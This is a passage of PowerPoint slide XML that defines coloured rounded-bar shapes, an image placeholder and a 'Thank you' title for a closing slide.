            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FAAB17"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5157215" y="2126742"/>
              <a:ext cx="3577590" cy="2545715"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3577590" h="2545715">
                  <a:moveTo>
                    <a:pt x="2604008" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2553972" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510470" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476138" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2453607" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2445512" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2445512" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2453607" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476138" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510470" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2553972" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2604008" y="1474342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654229" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2697843" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732234" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754786" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762885" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762885" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754786" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732234" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2697843" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654229" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2604008" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2545715">
                  <a:moveTo>
                    <a:pt x="3418205" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3368178" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324588" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3290124" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267475" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3259328" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3259328" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267475" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3290124" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324588" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3368178" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3418205" y="1474342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468426" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512040" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3546431" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568983" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577082" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3577082" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568983" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3546431" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512040" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468426" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3418205" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2545715">
                  <a:moveTo>
                    <a:pt x="158876" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108655" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108655" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="1474342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209098" y="1466248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252712" y="1443724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287103" y="1409411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309655" y="1365947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317754" y="1315974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317754" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309655" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287103" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252712" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209098" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2545715">
                  <a:moveTo>
                    <a:pt x="566674" y="1070609"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="516452" y="1078708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472838" y="1101260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438447" y="1135651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415895" y="1179265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407797" y="1229487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407797" y="2386926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415895" y="2436945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438447" y="2480438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472838" y="2514769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516452" y="2537300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="2545397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616749" y="2537300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660345" y="2514769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694790" y="2480438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717415" y="2436945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725551" y="2386926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725551" y="1229487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717415" y="1179265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694790" y="1135651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660345" y="1101260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616749" y="1078708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="1070609"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00BBEB"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469391" y="391668"/>
            <a:ext cx="795527" cy="422148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504444" y="2224277"/>
            <a:ext cx="2408555" cy="635635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5157215" y="470916"/>
            <a:ext cx="3986529" cy="4201795"/>
            <a:chOff x="5157215" y="470916"/>
            <a:chExt cx="3986529" cy="4201795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6380225" y="1028700"/>
              <a:ext cx="1947545" cy="3131185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1947545" h="3131185">
                  <a:moveTo>
                    <a:pt x="158876" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108655" y="8095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="30626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="64958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="108460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1316227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="1366511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="1410163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="1444573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108655" y="1467132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="1475232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208912" y="1467132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252414" y="1444573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286746" y="1410163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309277" y="1366511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="1316227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="158496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309277" y="108460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286746" y="64958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252414" y="30626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208912" y="8095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158876" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1947545" h="3131185">
                  <a:moveTo>
                    <a:pt x="566674" y="1097914"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="516452" y="1106013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472838" y="1128565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438447" y="1162956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415895" y="1206570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407797" y="1256792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407797" y="2414143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415895" y="2464178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438447" y="2507680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472838" y="2542012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516452" y="2564543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="2572639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616709" y="2564543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660211" y="2542012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694543" y="2507680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717074" y="2464178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725170" y="2414143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725170" y="1256792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717074" y="1206570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694543" y="1162956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660211" y="1128565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616709" y="1106013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566674" y="1097914"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1947545" h="3131185">
                  <a:moveTo>
                    <a:pt x="1788287" y="1655318"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1738313" y="1663429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694849" y="1686013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660536" y="1720441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638012" y="1764086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629918" y="1814322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629918" y="2972092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638012" y="3022125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660536" y="3065632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694849" y="3099974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738313" y="3122514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788287" y="3130613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838508" y="3122514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882122" y="3099974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916513" y="3065632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939065" y="3022125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947164" y="2972092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947164" y="1814322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939065" y="1764086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916513" y="1720441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882122" y="1686013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838508" y="1663429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788287" y="1655318"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="74BE4A"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5973317" y="470916"/>
              <a:ext cx="3170555" cy="4201795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3170554" h="4201795">
                  <a:moveTo>
                    <a:pt x="158877" y="1655572"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108655" y="1663670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="1686222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="1720613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="1764227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1814449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2971546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8098" y="3021581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30650" y="3065083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65041" y="3099415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108655" y="3121946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158877" y="3130042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208912" y="3121946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252414" y="3099415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286746" y="3065083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309277" y="3021581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="2971546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="1814449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309277" y="1764227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286746" y="1720613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252414" y="1686222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208912" y="1663670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158877" y="1655572"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3170554" h="4201795">
                  <a:moveTo>
                    <a:pt x="1788795" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1738821" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695357" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661044" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638520" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630426" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630426" y="1316101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638520" y="1366322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661044" y="1409936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695357" y="1444327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738821" y="1466879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788795" y="1474978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1839078" y="1466879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882730" y="1444327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917140" y="1409936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939699" y="1366322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947799" y="1316101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947799" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939699" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917140" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882730" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1839078" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788795" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3170554" h="4201795">
                  <a:moveTo>
                    <a:pt x="3011297" y="2726182"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2961061" y="2734281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2917416" y="2756840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882988" y="2791250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860404" y="2834902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852292" y="2885186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852292" y="4042727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860404" y="4092753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882988" y="4136253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2917416" y="4170589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2961061" y="4193125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011297" y="4201223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3061518" y="4193125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105132" y="4170589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139523" y="4136253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3162075" y="4092753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170174" y="4042727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170174" y="2885186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3162075" y="2834902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139523" y="2791250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105132" y="2756840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3061518" y="2734281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3011297" y="2726182"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E1221A"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5566409" y="1541526"/>
              <a:ext cx="3577590" cy="2616835"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3577590" h="2616835">
                  <a:moveTo>
                    <a:pt x="973200" y="1141603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="922979" y="1149701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879365" y="1172253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844974" y="1206644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="822422" y="1250258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814324" y="1300480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814324" y="2457805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="822422" y="2507818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844974" y="2551307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879365" y="2585635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922979" y="2608167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973200" y="2616263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023174" y="2608167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066638" y="2585635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100951" y="2551307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123475" y="2507818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131569" y="2457805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131569" y="1300480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123475" y="1250258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100951" y="1206644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066638" y="1172253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023174" y="1149701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973200" y="1141603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3577590" h="2616835">
                  <a:moveTo>
                    <a:pt x="1788287" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1738313" y="8098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694849" y="30650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660536" y="65041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638012" y="108655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629917" y="158876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1629917" y="1315339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638012" y="1365560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660536" y="1409174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1694849" y="1443565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738313" y="1466117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788287" y="1474216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838570" y="1466117"/>
                  </a:lnTo>
